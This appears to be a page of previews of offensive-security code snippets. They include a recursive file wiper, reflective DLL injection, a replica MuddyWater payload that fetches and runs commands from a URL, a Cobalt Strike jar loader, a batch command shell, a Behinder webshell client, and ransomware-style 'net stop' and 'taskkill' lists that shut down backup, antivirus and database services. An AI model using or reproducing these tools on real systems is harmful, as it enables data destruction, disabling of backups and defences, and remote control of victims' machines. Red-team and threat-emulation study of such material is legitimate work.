.\wipe <directory>
will rewrite all files in a directory recursively
| # adapted from https://stackoverflow.com/a/6291111 | |
| # | |
| # TargetObject = account with SPN | |
| # $TargetObject = "LDAP://CN=foo,CN=Users,DC=contoso,DC=local" | |
| # Identity = identity to be put in ACE | |
| # $Identity = [security.principal.ntaccount]"contoso\user" | |
| # $Identity = [security.principal.securityidentifier]"S-1-1-0" | |
| # Deny = deny or allow access | |
| Function Set-SpnPermission { | |
| param( |
| using System; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Security.Cryptography; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Threading.Tasks; | |
| using Microsoft.Win32; | |
| public class Crypto |
| //modified from: https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection | |
| #include <iostream> | |
| #include <windows.h> | |
| #include "resource.h" | |
| // Header of one base-relocation block (PE .reloc data): two DWORDs, the same layout as the | |
| // Windows SDK's IMAGE_BASE_RELOCATION (VirtualAddress, SizeOfBlock); usage is outside this excerpt. | |
| typedef struct BASE_RELOCATION_BLOCK { | |
| DWORD PageAddress; // RVA of the page the relocation entries that follow this header apply to | |
| DWORD BlockSize; // size of the whole block in bytes, this 8-byte header included | |
| } BASE_RELOCATION_BLOCK, * PBASE_RELOCATION_BLOCK; |
| Payload used by MuddyWater as detailed here: https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html | |
| Replace "http://127.0.0.1:8000/cmd" with link to page containing command | |
| Command page should be something like: "c:\windows\system32\cmd.exe /c calc.exe" |
| # pip install JPype1 | |
| import jpype | |
| import jpype.imports | |
| from jpype.types import * | |
| import os | |
| os.chdir("<cobaltstrike directory>") # required for auth file lookup | |
| jpype.startJVM() | |
| jpype.addClassPath("<cobaltstrike directory>/cobaltstrike.jar") |
| @echo off | |
| setlocal enabledelayedexpansion | |
| set "true=1" | |
| :loop | |
| if defined true ( | |
| set /p c="%cd%> " | |
| start !c! | |
| set c= |
| net stop "Acronis VSS Provider" /y | |
| net stop "Enterprise Client Service" /y | |
| net stop "SQLsafe Backup Service" /y | |
| net stop "SQLsafe Filter Service" /y | |
| net stop "Veeam Backup Catalog Data Service" /y | |
| net stop AcronisAgent /y | |
| net stop AcrSch2Svc /y | |
| net stop Antivirus /y | |
| net stop ARSM /y | |
| net stop BackupExecAgentAccelerator /y |
| # Behinder Webshell Clients | |
| ## php_cmd.py | |
| Minimal client for Behinder PHP webshell (shell.php). Requires Cmd.php from the official client jar. |
| net1 stop samss /y | |
| net1 stop veeamcatalogsvc /y | |
| net1 stop veeamcloudsvc /y | |
| net1 stop veeamdeploysvc /y | |
| net.exe stop samss /y | |
| net.exe stop veeamcatalogsvc /y | |
| net.exe stop veeamcloudsvc /y | |
| net.exe stop veeamdeploysvc /y | |
| taskkill.exe /IM sqlbrowser.exe /F | |
| taskkill.exe /IM sqlceip.exe /F |